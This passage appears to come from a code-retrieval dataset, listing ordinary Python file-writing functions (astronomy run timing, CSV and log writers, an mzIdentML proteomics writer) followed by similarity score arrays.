Failing that, we try again from the start,\n # to account for runs with time stamp issues.\n if instrument == 'HiPERCAM':\n nback = 4\n elif rtime.header['MODE'] == 'DRIFT':\n # ultracam or hipercam\n win = rtime.win[0]\n nyu = win.ny*rtime.ybin\n nback = int((1033/nyu + 1) / 2) + 3\n elif rtime.header['MODE'] == 'UDRIFT':\n # ultraspec\n win = rtime.win[0]\n nyu = win.ny*rtime.ybin\n nback = int((1037/nyu + 1) / 2) + 3\n else:\n # non drift mode\n nback = 4\n\n if instrument == 'HiPERCAM':\n ntotal = rtime.ntotal()\n else:\n nbytes = os.stat(dfile + '.dat').st_size\n ntotal = nbytes // rtime.framesize\n\n if instrument != 'HiPERCAM' and ntotal > 20000:\n # this is a risk-reducing strategy in case the end\n # of a long ultracam or ultraspec run is\n # corrupt. Better to look at more than the\n # necessary number of frames if it prevents us\n # from having to wind through the whole lot.\n nback = max(nback, 500)\n\n # next statement basically resets the frame\n # we are on\n nreset = max(1, ntotal - nback)\n rtime.set(nreset)\n\n flast = False\n for n, tdat in enumerate(rtime):\n if instrument == 'HiPERCAM':\n time, tinfo, tflag = tdat\n nexpose = 1000000\n for tmid,texp,tiflag in tinfo:\n nexpose = min(round(texp,3),expose)\n else:\n time, tinfo = tdat[:2]\n tflag = time.good\n nexpose = round(time.expose,3)\n\n if instrument == 'HiPERCAM' or tflag:\n mjd = time.mjd\n if mjd >= mjd_start and mjd < mjd_start + 0.4:\n mjd_end = mjd\n ts = Time(mjd_end, format=\"mjd\", precision=2)\n ut_end = ts.hms_custom\n n_end = nreset + n\n if nexpose < 2000:\n expose = max(expose, nexpose)\n flast = True\n\n if not flast:\n # no good time found near end. There must be\n # one or we wouldn't get to this point, so\n # grind it out the hard way by going through\n # the whole run, which can be slow.\n rtime.set()\n for n, tdat in enumerate(rtime):\n if instrument == 'HiPERCAM':\n time, tinfo, tflag = tdat\n nexpose = 1000000\n for tmid,texp,tiflag in tinfo:\n nexpose = min(round(texp,3),expose)\n else:\n time, tinfo = tdat[:2]\n tflag = time.good\n nexpose = round(time.expose,3)\n\n if tflag:\n mjd = time.mjd\n if mjd >= mjd_start and mjd < mjd_start + 0.4:\n mjd_end = mjd\n ts = Time(mjd_end, format=\"mjd\", precision=2)\n ut_end = ts.hms_custom\n n_end = n + 1\n if nexpose < 2000:\n expose = max(expose, nexpose)\n\n nok = n_end-n_start+1\n if n_end > n_start:\n cadence = round(86400*(mjd_end-mjd_start)/(n_end-n_start),3)\n tdata[run] = [ut_start,mjd_start,ut_end,mjd_end,cadence,expose,nok,ntotal]\n else:\n cadence = 'UNDEF'\n tdata[run] = [ut_start,mjd_start,ut_end,mjd_end,'',expose,nok,ntotal]\n tout.write(f'{run} {ut_start} {mjd_start} {ut_end} {mjd_end} {cadence} {expose} {nok} {ntotal}\\n')\n\n except hcam.ucam.PowerOnOffError:\n # Power on/off\n tdata[run] = ['power-on-off',]\n tout.write(f'{run} power-on-off\\n')\n if full: print(f'{run} was a power-on or -off')\n\n except hcam.HipercamError:\n # No good times\n tdata[run] = ['','','','','','',0,ntotal]\n tout.write(f'{run} UNDEF UNDEF UNDEF UNDEF UNDEF UNDEF 0 {ntotal}\\n')\n if full:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback, limit=1)\n traceback.print_exc()\n print(f'No good times found for {run}; ntotal = {ntotal}')\n\n except:\n # some other failure\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback, limit=1)\n traceback.print_exc()\n print(\"Problem on run = \", dfile)\n\n # Load of undefined\n tdata[run] = 8*['']\n tout.write(f'{run} {\" 
\".join(8*[\"UNDEF\"])}\\n')\n\n if okwrite:\n print('Written timing data to',times)\n\n return tdata", "def genScheduleCSV():\r\n try: \r\n printSchedule()\r\n save_class_list()\r\n print(\"\\nSchedule generated, check working directory\")\r\n except Exception as e:\r\n print(\"Exception found\" + str(e))", "def video_times():\n p = parse_cmdline(get_parser=get_parser_times)\n log.setup_main_handler(\n mods=(\"fogtools\", \"typhon\", \"fogpy\", \"sattools\", \"fcitools\", \"satpy\",\n \"pyresample\"),\n level=logging.DEBUG)\n vis.show_video_abi_glm_times(\n start_date=p.start_time,\n end_date=p.end_time,\n img_out=p.filename_pattern_image,\n vid_out=p.filename_pattern_video,\n out_dir=p.outdir,\n sector=p.sector,\n area=p.area)\n print(\"Files written to:\", p.outdir)", "def write_list(args, file_list):\n if not args.listfile.endswith(\".txt\"):\n args.listfile += \".txt\"\n outputfile = open(args.listfile, 'w')\n for name in file_list:\n outputfile.write(name)\n outputfile.write(\"\\n\")\n outputfile.close()", "def create_file_output(self, results):\n for key, value in results.table_output.items():\n name_timestamp = key.split('&')\n _name = name_timestamp[0]\n timestamp = name_timestamp[1]\n file_name = output_file_prefix + \"-\" + _name + \".csv\"\n if file_name not in self.file_creation_set:\n self._header_written = False\n self.file_creation_set.update([file_name])\n for row in value:\n with open(file_name, 'a+') as file_to_write:\n row.update({'Timestamp': timestamp})\n _keys = row.keys()\n file_output = csv.DictWriter(file_to_write, _keys)\n if not self._header_written:\n file_output.writeheader()\n self._header_written = True\n file_output.writerow(row)\n file_to_write.close()\n return results", "def save_file(self):\n f = open(self._file_name, \"w\")\n try:\n for rental in self.list:\n rental_str = self.obj_to_string(rental)\n f.write(rental_str)\n f.close()\n except Exception as e:\n raise e", "def produce_submission(ids, y, filename):\n final_submission = pd.DataFrame({'Id': ids, 'SalePrice': y})\n final_submission.to_csv(f'../Submissions/{filename}.csv', index=False)", "def saveauto(self):\n self.inp.getedge()\n ss=ss=strftime(\"_%Y-%m-%d_%H:%M:%S\", gmtime())\n fn=os.environ['VMEWORKDIR'] +\"/WORK/phases/\"+self.name+ss+self.inp.edge+\"_\"+self.inp.inpnum+\"_\"+self.inp.ctpnum+\".ps\"\n rc=self.c1.postscript(file=fn)\n if rc is not '':\n MywError(errmsg=\"File \"+fn+\" cannot be created.\")\n print \"rc=\",rc,len(rc)\n else:\n print \"File \",fn, \" saved.\"", "def save_lidar(data, data_directory, loc):\n t0 = dt.datetime(1970, 1, 1) + dt.timedelta(seconds=data[0][1])\n t0_day = dt.datetime(t0.year, t0.month, t0.day)\n secs = (t0_day - dt.datetime(1970, 1, 1)).total_seconds()\n\n t = [i[1] - secs for i in data]\n meas = [i[2] for i in data]\n try:\n with open(os.path.join(data_directory, loc, 'lidar', t0_day.strftime('%Y-%m-%d.txt')), 'a+') as f:\n for i, j in zip(t, meas):\n f.write(f'{i} {j}\\n')\n except FileNotFoundError:\n print(\"Data directory is bad. Try again. 
\")\n sys.exit(0)", "def write_file(self, psm_list: PSMList):\n file = open(self.filename, \"wb\")\n with Progress(disable=not self.show_progressbar) as progress:\n with MzIdentMLWriter(file, close=True) as writer:\n writer.controlled_vocabularies()\n writer.provenance(\n software={\n \"name\": \"psm_utils\",\n \"uri\": \"https://github.com/compomics/psm_utils\",\n \"version\": __version__,\n }\n )\n writer.register(\"SpectraData\", 1)\n writer.register(\"SearchDatabase\", 1)\n writer.register(\"SpectrumIdentificationList\", 1)\n writer.register(\"SpectrumIdentificationProtocol\", 1)\n\n proteins = set()\n peptide_ids = set()\n peptide_evidence_ids = set()\n\n proteins = {\n prot\n for prot_list in list(psm_list[\"protein_list\"])\n if prot_list\n for prot in prot_list\n }\n\n spec_id_dict = psm_list.get_psm_dict()\n task1 = progress.add_task(\"[cyan]Writing Proteins to mzid\", total=len(proteins))\n task2 = progress.add_task(\n \"[cyan]Writing Peptide and PeptideEvidence items\",\n total=len(psm_list),\n )\n task3 = progress.add_task(\n \"[cyan]Writing SpectrumIdentificationResults\",\n total=len(psm_list),\n )\n\n with writer.sequence_collection():\n for prot in proteins:\n writer.write_db_sequence(prot, None, id=prot, params=[])\n progress.update(task1, advance=1)\n for psm in psm_list:\n peptide = psm[\"peptidoform\"]\n if peptide not in peptide_ids:\n writer.write_peptide(**self._create_peptide_object(peptide))\n peptide_ids.add(peptide)\n\n if psm[\"protein_list\"]:\n for protein in psm[\"protein_list\"]:\n peptide_evidence_id = (\n f\"PeptideEvidence_{peptide.proforma}_{protein}\"\n )\n if peptide_evidence_id not in peptide_evidence_ids:\n peptide_evidence_ids.add(peptide_evidence_id)\n writer.write_peptide_evidence(\n peptide_id=\"Peptide_\" + peptide.proforma,\n db_sequence_id=protein,\n id=peptide_evidence_id,\n start_position=None,\n end_position=None,\n is_decoy=psm[\"is_decoy\"],\n )\n progress.update(task2, advance=1)\n with writer.analysis_collection():\n writer.SpectrumIdentification([1], [1]).write(writer)\n\n with writer.analysis_protocol_collection():\n writer.spectrum_identification_protocol() # build without?\n\n with writer.data_collection():\n spectra_data, spectra_data_id_dict = self._transform_spectra_data(\n spec_id_dict=spec_id_dict\n )\n writer.inputs(\n source_files=[],\n # # if fasta file is given, we can parse here and add protein information\n # search_databases=transform_search_database(),\n spectra_data=spectra_data,\n )\n\n with writer.analysis_data():\n with writer.spectrum_identification_list(id=1):\n for collection in spec_id_dict.keys():\n for run in spec_id_dict[collection].keys():\n spectra_data_id = spectra_data_id_dict[\n \"/\".join(filter(None, [collection, run]))\n ]\n for spec_id in spec_id_dict[collection][run].keys():\n identified_psms = spec_id_dict[collection][run][spec_id]\n writer.write_spectrum_identification_result(\n **self._transform_spectrum_identification_result(\n spec_id, identified_psms, spectra_data_id\n )\n )\n progress.update(\n task3,\n advance=len(spec_id_dict[collection][run][spec_id]),\n )", "def make_log():\n log_file = os.path.join(phys_dir,'ge_phys2bids_'+datetime.now().strftime(\"%Y-%m-%d_%H-%M-%S\")+'.log')\n with open(log_file,'w') as log:\n log.write('-------- GE phys2bids --------\\n\\n')\n log.write('DICOM directory: %s\\n'%dcm_dir)\n log.write('Physiology directory: %s\\n'%phys_dir)\n log.write('Output directory: %s\\n\\n'%out_dir)\n log.write('%d EPI files were found\\n\\n'%len(dcm_dict))\n for rn in 
dcm_dict.keys():\n log.write('------------------------------\\n')\n log.write('%s\\n'%dcm_dict[rn]['out_name'])\n log.write('Start time: %s\\n'%dcm_dict[rn]['start_time'].strftime(\"%Y-%m-%d %H:%M:%S\"))\n log.write('End time: %s\\n'%dcm_dict[rn]['end_time'].strftime(\"%Y-%m-%d %H:%M:%S\"))\n log.write('PPG file: %s\\n'%dcm_dict[rn]['ppg_file'])\n log.write('Respiration file: %s\\n'%dcm_dict[rn]['resp_file'])\n log.write('ECG file: %s\\n'%dcm_dict[rn]['ecg_file'])\n log.write('------------------------------\\n\\n')", "def save_specs(self, filename):\n pass", "def save_specs(self, filename):\n pass" ]
[ "0.5606279", "0.54776007", "0.5325414", "0.527905", "0.5232085", "0.5220749", "0.5214294", "0.5194305", "0.5157583", "0.5149266", "0.51426595", "0.51125914", "0.50968117", "0.50955224", "0.50598377", "0.50564367", "0.5056409", "0.5055913", "0.50520384", "0.5035325", "0.5033409", "0.5027646", "0.50266147", "0.5026436", "0.5022758", "0.5014538", "0.49741006", "0.49613667", "0.49586824", "0.49513194", "0.4944087", "0.49381602", "0.49261457", "0.49000242", "0.48933017", "0.48906934", "0.48898938", "0.48813817", "0.4874133", "0.48721597", "0.48680714", "0.48677072", "0.48579812", "0.48568517", "0.4849215", "0.48474246", "0.4843157", "0.48410824", "0.48304164", "0.48284736", "0.48059696", "0.4794929", "0.47929558", "0.47905436", "0.47886503", "0.47851858", "0.4782985", "0.47818473", "0.47775805", "0.47760293", "0.47706646", "0.47671488", "0.4761552", "0.47590894", "0.47587916", "0.47575358", "0.47551662", "0.47491494", "0.47491494", "0.4747236", "0.47442716", "0.47352776", "0.4733876", "0.47337598", "0.47211617", "0.47181314", "0.47174343", "0.4715309", "0.47124705", "0.47123492", "0.4702876", "0.46992984", "0.46982703", "0.46956497", "0.4689761", "0.46885684", "0.46882904", "0.4686545", "0.46833786", "0.46799856", "0.46748278", "0.46697903", "0.46668133", "0.46634257", "0.4663174", "0.4661416", "0.46560308", "0.46541923", "0.46516296", "0.46516296" ]
0.7020351
0
Function that downloads a whole video when no interval is supplied. Downloaded to the same place where yt_vids is saved to (from the save_link_time func)
def download_whole(no_interval):
    print(os.getcwd())
    SAVE_PATH = 'tmp'
    ydl_opts = {"nocheckcertificate": True, "noplaylist": True,
                'outtmpl': f'{SAVE_PATH}/%(title)s.%(ext)s'}
    with youtube_dl.YoutubeDL(ydl_opts) as ydl:
        for video in range(len(no_interval)):
            try:
                ydl.download([no_interval[video]])
            except (youtube_dl.utils.ExtractorError, youtube_dl.utils.DownloadError):
                print(f"Couldn't download {no_interval[video]}")
                continue
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def download(df_shorter,folderName):\n os.mkdir(str(folderName))\n path = os.getcwd()+'\\\\'+str(folderName)+'\\\\'\n #add column with video link generated from IDs\n df_shorter['urls'] = df_shorter['id'].apply(lambda x: generateLinkFromId(x))\n vid_dl = []\n i = 1\n for url in df_shorter['urls']:\n if url != False:\n name = str(i)+'.mp4'\n vid_dl.append(wget.download(url,path+name))#retrun the path of the saved video\n i = i+1\n return vid_dl", "def download_videos(download_limit=6):\n videos = []\n for fname in os.listdir('yt_api_data'):\n videos += load_video_data(fname)\n vids_downloaded = 0\n excluded_vids = get_excluded_videos()\n for video_id, title in videos:\n if download_limit != 'all' and vids_downloaded == download_limit:\n break\n title = title.replace(' ', '_')\n mkv_path = \"videos/\" + title + \".mkv\"\n mp4_path = \"videos/\" + title + \".mp4\"\n download_fpath = \"videos/\" + title\n if not check_excluded_list(excluded_vids, title) and not os.path.isfile(mkv_path) and not os.path.isfile(mp4_path):\n print(colored(str(vids_downloaded + 1) + \": \", \"yellow\") + colored(video_id + \" downloading: \" + download_fpath, \"green\"))\n command_prefix = \"youtube-dl -o \" + download_fpath\n if video_id[0] == '-': \n os.system(command_prefix + \" -- \" + video_id)\n else:\n os.system(command_prefix + \" \" + video_id)\n vids_downloaded += 1\n else:\n print(colored(\"skipping download: \" + title + \"with youtube_id: \" + video_id, \"yellow\"))", "def download_videos(blink, save_dir=\"/media\"):\n blink.download_videos(save_dir, since=get_date())", "def download_cdn_videos(filenames,sub_urls,handout_urls,video_urls, target_dir):\n \"\"\" using a simple file downloader \"\"\"\n for i, v in enumerate(video_urls):\n filename_prefix = str(i+1).zfill(2) + '-'\n #original_filename = v.rsplit('/', 1)[1]\n video_filename = filename_prefix + filenames[i] + '.mp4'\n sub_filename = filename_prefix + filenames[i] + '.srt'\n handout_filename = filename_prefix + filenames[i] + '.srt'\n video_path = os.path.join(target_dir, video_filename)\n sub_path = os.path.join(target_dir, sub_filename)\n handout_path = os.path.join(target_dir, handout_filename)\n #print('[debug] GET %s' % v)\n print('[download] Destination: %s' % video_path)\n v = quote(v,safe=\":/\")\n if len(v) != YOUTUBE_VIDEO_ID_LENGTH:\n req = Request(v) \n try:\n video = urlopen(v)\n fileSize = int(video.headers['content-length'])\n finish = False\n existSize = 0\n if os.path.exists(video_path):\n output = open(video_path,\"ab\")\n existSize = os.path.getsize(video_path)\n #If the file exists, then only download the remainder\n if existSize < fileSize:\n #print(\"[debug] bytes range is: %s-%s\" % (existSize,fileSize))\n req.headers[\"Range\"]= \"bytes=%s-%s\" % (existSize,fileSize)\n video = urlopen(req)\n else:\n finish = True\n else:\n output = open(video_path,\"wb\")\n if finish == False:\n file_size_dl = existSize\n block_sz = 262144\n while True:\n buffer = video.read(block_sz)\n if not buffer:\n break\n \n file_size_dl += len(buffer)\n output.write(buffer)\n status = r\"%10d [%3.2f%%]\" % (file_size_dl, file_size_dl * 100. 
/ fileSize)\n status = status + chr(8)*(len(status)+1)\n sys.stdout.write(status)\n sys.stdout.flush()\n \n output.close()\n\n except URLError as e:\n print(\"[warning]error: %r when downloading %s\" % (e.reason,v) )\n\n else:\n download_youtube_video(v,video_path)\n \n if sub_urls[i] != \"\":\n #print('[debug] GET %s' % BASE_URL+sub_urls[i])\n if not os.path.exists(sub_path):\n subs_string = edx_get_subtitle(sub_urls[i], headers)\n if subs_string:\n print('[info] Writing edX subtitles: %s' % sub_path)\n open(os.path.join(os.getcwd(), sub_path),\n 'wb+').write(subs_string.encode('utf-8'))\n\n if handout_urls[i] != \"\":\n #print('[debug] GET %s' % BASE_URL+sub_urls[i])\n if not os.path.exists(handout_path):\n handout_content = urlopen(BASE_URL+handout_urls[i]).read()\n if handout_content:\n print('[info] Writing handout: %s' % handout_path)\n open(os.path.join(os.getcwd(), handout_path),\n 'wb+').write(handout_content)\n #srtfile = urlopen(BASE_URL+sub_urls[i])\n #output = open(srt_path,'wb')\n #output.write(srtfile.read())\n #output.close()", "async def download_video(v_url):\n reply = await v_url.get_reply_message()\n if v_url.pattern_match.group(2) != \"\":\n url = v_url.pattern_match.group(2)\n elif reply is not None:\n url = reply.message\n url = re.findall(r\"\\bhttps?://.*\\.\\S+\", reply.message)[0]\n else:\n return\n type = (\n v_url.pattern_match.group(1).lower()\n if v_url.pattern_match.group(1) is not None\n else \"a\"\n )\n await v_url.edit(\"`Preparing to download...`\")\n out_folder = Config.TMP_DOWNLOAD_DIRECTORY + \"youtubedl/\"\n Config.TMP_DOWNLOAD_DIRECTORY + \"/thumb_image.jpg\"\n if not os.path.isdir(out_folder):\n os.makedirs(out_folder)\n if type == \"a\":\n opts = {\n \"format\": \"bestaudio\",\n \"addmetadata\": True,\n \"noplaylist\": False,\n \"key\": \"FFmpegMetadata\",\n \"writethumbnail\": True,\n \"embedthumbnail\": True,\n \"prefer_ffmpeg\": True,\n \"geo_bypass\": True,\n \"nocheckcertificate\": True,\n \"postprocessors\": [\n {\n \"key\": \"FFmpegExtractAudio\",\n \"preferredcodec\": \"mp3\",\n \"preferredquality\": \"320\",\n }\n ],\n \"outtmpl\": out_folder + \"%(title)s.%(ext)s\",\n \"quiet\": True,\n \"logtostderr\": False,\n }\n video = False\n song = True\n\n elif type == \"v\":\n opts = {\n \"format\": \"best\",\n \"addmetadata\": True,\n \"noplaylist\": False,\n \"getthumbnail\": True,\n \"embedthumbnail\": True,\n \"xattrs\": True,\n \"writethumbnail\": True,\n \"key\": \"FFmpegMetadata\",\n \"prefer_ffmpeg\": True,\n \"geo_bypass\": True,\n \"nocheckcertificate\": True,\n \"postprocessors\": [\n {\"key\": \"FFmpegVideoConvertor\", \"preferedformat\": \"mp4\"},\n ],\n \"outtmpl\": out_folder + \"%(title)s.%(ext)s\",\n \"logtostderr\": False,\n \"quiet\": True,\n }\n song = False\n video = True\n\n try:\n await v_url.edit(\"`Fetching playlist data, please wait..`\")\n with YoutubeDL(opts) as ytdl:\n ytdl.extract_info(url)\n # print(ytdl_data['thumbnail'])\n filename = sorted(get_lst_of_files(out_folder, []))\n except DownloadError as DE:\n await v_url.edit(f\"`{str(DE)}`\")\n return\n except ContentTooShortError:\n await v_url.edit(\"`The download content was too short.`\")\n return\n except GeoRestrictedError:\n await v_url.edit(\n \"`Video is not available from your geographic location due to geographic restrictions imposed by a website.`\"\n )\n return\n except MaxDownloadsReached:\n await v_url.edit(\"`Max-downloads limit has been reached.`\")\n return\n except PostProcessingError:\n await v_url.edit(\"`There was an error during post 
processing.`\")\n return\n except UnavailableVideoError:\n await v_url.edit(\"`Media is not available in the requested format.`\")\n return\n except XAttrMetadataError as XAME:\n await v_url.edit(f\"`{XAME.code}: {XAME.msg}\\n{XAME.reason}`\")\n return\n except ExtractorError:\n await v_url.edit(\"`There was an error during info extraction.`\")\n return\n except Exception as e:\n await v_url.edit(f\"{str(type(e)): {str(e)}}\")\n return\n c_time = time.time()\n await v_url.edit(\"`YouTube Playlist Downloading Processing Now.\\nPlease Wait!`\")\n if song:\n for single_file in filename:\n if os.path.exists(single_file):\n caption_rts = os.path.basename(single_file)\n force_document = True\n supports_streaming = False\n document_attributes = []\n if single_file.endswith((\".mp4\", \".mp3\", \".flac\", \".webm\")):\n metadata = extractMetadata(createParser(single_file))\n duration = 0\n width = 0\n height = 180\n if metadata.has(\"duration\"):\n duration = metadata.get(\"duration\").seconds\n document_attributes = [\n DocumentAttributeVideo(\n duration=duration,\n w=width,\n h=height,\n round_message=False,\n supports_streaming=True,\n )\n ]\n try:\n ytdl_data_name_audio = os.path.basename(single_file)\n thumb = (\n out_folder\n + ytdl_data_name_audio[: (len(ytdl_data_name_audio) - 4)]\n + \".jpg\"\n )\n print(ytdl_data_name_audio)\n file_path = single_file\n song_size = file_size(file_path)\n await v_url.client.send_file(\n v_url.chat_id,\n single_file,\n caption=f\"`{ytdl_data_name_audio}`\"\n + \"\\n\"\n + f\"Size👉 {song_size}\",\n force_document=force_document,\n supports_streaming=supports_streaming,\n allow_cache=False,\n thumb=thumb,\n reply_to=v_url.message.id,\n attributes=document_attributes,\n progress_callback=lambda d, t: asyncio.get_event_loop().create_task(\n progress(\n d,\n t,\n v_url,\n c_time,\n \"Uploading..\",\n f\"{ytdl_data_name_audio}\",\n )\n ),\n )\n # os.remove(thumb)\n except Exception as e:\n await v_url.client.send_message(\n v_url.chat_id,\n \"{} caused `{}`\".format(caption_rts, str(e)),\n )\n continue\n os.remove(single_file)\n await asyncio.sleep(DELETE_TIMEOUT)\n # await v_url.delete()\n shutil.rmtree(out_folder)\n if video:\n for single_file in filename:\n if os.path.exists(single_file):\n caption_rts = os.path.basename(single_file)\n force_document = False\n supports_streaming = True\n document_attributes = []\n if single_file.endswith((\".mp4\", \".mp3\", \".flac\", \".webm\")):\n metadata = extractMetadata(createParser(single_file))\n duration = 0\n width = 0\n height = 0\n if metadata.has(\"duration\"):\n duration = metadata.get(\"duration\").seconds\n document_attributes = [\n DocumentAttributeVideo(\n duration=duration,\n w=width,\n h=height,\n round_message=False,\n supports_streaming=True,\n )\n ]\n # print(ytdl_data)\n # for file in os.listdir(\"./DOWNLOADS/youtubedl/\"):\n # if file.endswith(\".jpg\"):\n # thumb = \"./DOWNLOADS/youtubedl/\" + file\n # print(os.path.join(\"./DOWNLOADS/youtubedl/\", file))\n # image_link = ytdl_data['thumbnail']\n # downloaded_image = wget.download(image_link,out_folder)\n # thumb = ytdl_data_name_video + \".jpg\"\n file_path = single_file\n video_size = file_size(file_path)\n try:\n ytdl_data_name_video = os.path.basename(single_file)\n thumb = (\n out_folder\n + ytdl_data_name_video[: (len(ytdl_data_name_video) - 4)]\n + \".jpg\"\n )\n await v_url.client.send_file(\n v_url.chat_id,\n single_file,\n caption=f\"`{ytdl_data_name_video}`\"\n + \"\\n\"\n + f\"Size👉 {video_size}\",\n force_document=force_document,\n 
supports_streaming=supports_streaming,\n thumb=thumb,\n allow_cache=False,\n reply_to=v_url.message.id,\n attributes=document_attributes,\n progress_callback=lambda d, t: asyncio.get_event_loop().create_task(\n progress(\n d,\n t,\n v_url,\n c_time,\n \"Uploading..\",\n f\"{ytdl_data_name_video}\",\n )\n ),\n )\n # os.remove(thumb)\n except Exception as e:\n await v_url.client.send_message(\n v_url.chat_id,\n \"{} caused `{}`\".format(caption_rts, str(e)),\n )\n continue\n os.remove(single_file)\n await asyncio.sleep(DELETE_TIMEOUT)\n # await v_url.delete()\n shutil.rmtree(out_folder)", "async def download_video(event):\n url = event.pattern_match.group(1)\n rmsg = await event.get_reply_message()\n if not url and rmsg:\n myString = rmsg.text\n url = re.search(\"(?P<url>https?://[^\\s]+)\", myString).group(\"url\")\n if not url:\n return await edit_or_reply(event, \"What I am Supposed to find? Give link\")\n codevent = await edit_or_reply(event, \"`Preparing to download...`\")\n reply_to_id = await reply_id(event)\n ytdl_data = await ytdl_down(codevent, video_opts, url)\n if ytdl_down is None:\n return\n f = pathlib.Path(f\"{ytdl_data['title']}.mp4\".replace(\"|\", \"_\"))\n codthumb = pathlib.Path(f\"{ytdl_data['title']}.jpg\".replace(\"|\", \"_\"))\n if not os.path.exists(codthumb):\n codthumb = pathlib.Path(f\"{ytdl_data['title']}.webp\".replace(\"|\", \"_\"))\n if not os.path.exists(codthumb):\n codthumb = None\n await codevent.edit(\n f\"`Preparing to upload video:`\\\n \\n**{ytdl_data['title']}**\\\n \\nby *{ytdl_data['uploader']}*\"\n )\n ul = io.open(f, \"rb\")\n c_time = time.time()\n attributes, mime_type = await fix_attributes(f, ytdl_data, supports_streaming=True)\n uploaded = await event.client.fast_upload_file(\n file=ul,\n progress_callback=lambda d, t: asyncio.get_event_loop().create_task(\n progress(d, t, codevent, c_time, \"upload\", file_name=f)\n ),\n )\n ul.close()\n media = types.InputMediaUploadedDocument(\n file=uploaded,\n mime_type=mime_type,\n attributes=attributes,\n thumb=await event.client.upload_file(codthumb) if codthumb else None,\n )\n await event.client.send_file(\n event.chat_id,\n file=media,\n reply_to=reply_to_id,\n caption=ytdl_data[\"title\"],\n )\n os.remove(f)\n if codthumb:\n os.remove(codthumb)\n await event.delete()", "def download(idd, path):\n print(f'[{script}]: Downloading YT video \"{idd}\"...') if verbosity >= 1 else None\n\n try:\n yt = pytube.YouTube(\"https://www.youtube.com/watch?v=\" + idd)\n stream = yt.streams.filter(progressive=True).first()\n stream.download(path, filename=idd)\n except Exception:\n print(f'[{script}]: Failed download of YT video \"{idd}\".')\n return None\n\n data = {\n \"idd\": idd,\n \"abr\": stream.abr,\n \"acodec\": stream.audio_codec,\n \"bitrate\": stream.bitrate,\n \"codecs\": stream.codecs,\n \"fps\": stream.fps,\n \"mime\": stream.mime_type,\n \"res\": stream.resolution,\n \"vcodec\": stream.video_codec,\n \"size\": stream._filesize,\n \"frames\": stream.fps * yt.length,\n }\n\n file_path = path + \"/\" + data[\"idd\"] + \".mp4\"\n print(\n f'[{script}]: Download successful. 
Saved to \"{file_path}\".'\n ) if verbosity >= 2 else None\n return data", "def download(dltype, num):\n # This function needs refactoring!\n # pylint: disable=R0912\n # pylint: disable=R0914\n if g.browse_mode == \"ytpl\" and dltype in (\"da\", \"dv\"):\n plid = g.ytpls[int(num) - 1][\"link\"]\n down_plist(dltype, plid)\n return\n\n elif g.browse_mode == \"ytpl\":\n g.message = \"Use da or dv to specify audio / video playlist download\"\n g.message = c.y + g.message + c.w\n g.content = generate_songlist_display()\n return\n\n elif g.browse_mode != \"normal\":\n g.message = \"Download must refer to a specific video item\"\n g.message = c.y + g.message + c.w\n g.content = generate_songlist_display()\n return\n\n writestatus(\"Fetching video info...\")\n song = (g.model.songs[int(num) - 1])\n best = dltype.startswith(\"dv\") or dltype.startswith(\"da\")\n\n if not best:\n\n try:\n # user prompt for download stream\n url, ext, url_au, ext_au = prompt_dl(song)\n\n except KeyboardInterrupt:\n g.message = c.r + \"Download aborted!\" + c.w\n g.content = generate_songlist_display()\n return\n\n if not url or ext_au == \"abort\":\n # abort on invalid stream selection\n g.content = generate_songlist_display()\n g.message = \"%sNo download selected / invalid input%s\" % (c.y, c.w)\n return\n\n else:\n # download user selected stream(s)\n filename = _make_fname(song, ext)\n args = (song, filename, url)\n\n if url_au and ext_au:\n # downloading video and audio stream for muxing\n audio = False\n filename_au = _make_fname(song, ext_au)\n args_au = (song, filename_au, url_au)\n\n else:\n audio = ext in (\"m4a\", \"ogg\")\n\n kwargs = dict(audio=audio)\n\n elif best:\n # set updownload without prompt\n url_au = None\n av = \"audio\" if dltype.startswith(\"da\") else \"video\"\n audio = av == \"audio\"\n filename = _make_fname(song, None, av=av)\n args = (song, filename)\n kwargs = dict(url=None, audio=audio)\n\n try:\n # perform download(s)\n dl_filenames = [args[1]]\n f = _download(*args, **kwargs)\n if f:\n g.message = \"Saved to \" + c.g + f + c.w\n\n if url_au:\n dl_filenames += [args_au[1]]\n _download(*args_au, allow_transcode=False, **kwargs)\n\n except KeyboardInterrupt:\n g.message = c.r + \"Download halted!\" + c.w\n\n try:\n for downloaded in dl_filenames:\n os.remove(downloaded)\n\n except IOError:\n pass\n\n if url_au:\n # multiplex\n mux_cmd = \"APP -i VIDEO -i AUDIO -c copy OUTPUT\".split()\n mux_cmd = \"%s -i %s -i %s -c copy %s\"\n mux_cmd = [g.muxapp, \"-i\", args[1], \"-i\", args_au[1], \"-c\",\n \"copy\", args[1][:-3] + \"mp4\"]\n\n try:\n subprocess.call(mux_cmd)\n g.message = \"Saved to :\" + c.g + mux_cmd[7] + c.w\n os.remove(args[1])\n os.remove(args_au[1])\n\n except KeyboardInterrupt:\n g.message = \"Audio/Video multiplex aborted!\"\n\n g.content = generate_songlist_display()", "def do_downloads(filename1=\"og\", filename2=\"lyrical\", video_id=DEFALT_VIDEO_ID):\n original_video_url = youtube_id_to_url(video_id)\n download_from_url(original_video_url, filename1)\n lyrics_video_url = get_lyrics_url(original_video_url)\n download_from_url(lyrics_video_url, filename2)\n\n return filename1, filename2", "def download_vid(vid_link, quality_num=None):\r\n if quality_num is not None:\r\n # if quality_num provided\r\n try:\r\n os.system(\"youtube-dl -f \"+str(quality_num)+\" \\'\"+str(vid_link)+\"\\'\")\r\n except Exception:\r\n print(Exception)\r\n else:\r\n # by default the best quality is downloaded\r\n try:\r\n os.system(\"youtube-dl \"+str(vid_link))\r\n except Exception:\r\n 
print(Exception)", "def download_wrapper(youtube_id, output_dir):\n # we do this to align with names in annotations\n output_filename = os.path.join(output_dir, youtube_id + '.mp4')\n if os.path.exists(output_filename):\n status = tuple([youtube_id, True, 'Exists'])\n return status\n\n downloaded, log = download(youtube_id, output_filename)\n status = tuple([youtube_id, downloaded, log])\n return status", "def youtube_download_by_id(id, title=None, output_dir='.', merge=True, info_only=False):\n \n raw_video_info = get_content('http://www.youtube.com/get_video_info?video_id=%s' % id)\n video_info = parse.parse_qs(raw_video_info)\n \n if video_info['status'] == ['ok'] and ('use_cipher_signature' not in video_info or video_info['use_cipher_signature'] == ['False']):\n title = parse.unquote_plus(video_info['title'][0])\n stream_list = parse.parse_qs(raw_video_info)['url_encoded_fmt_stream_map'][0].split(',')\n \n else:\n # Parse video page when video_info is not usable.\n video_page = 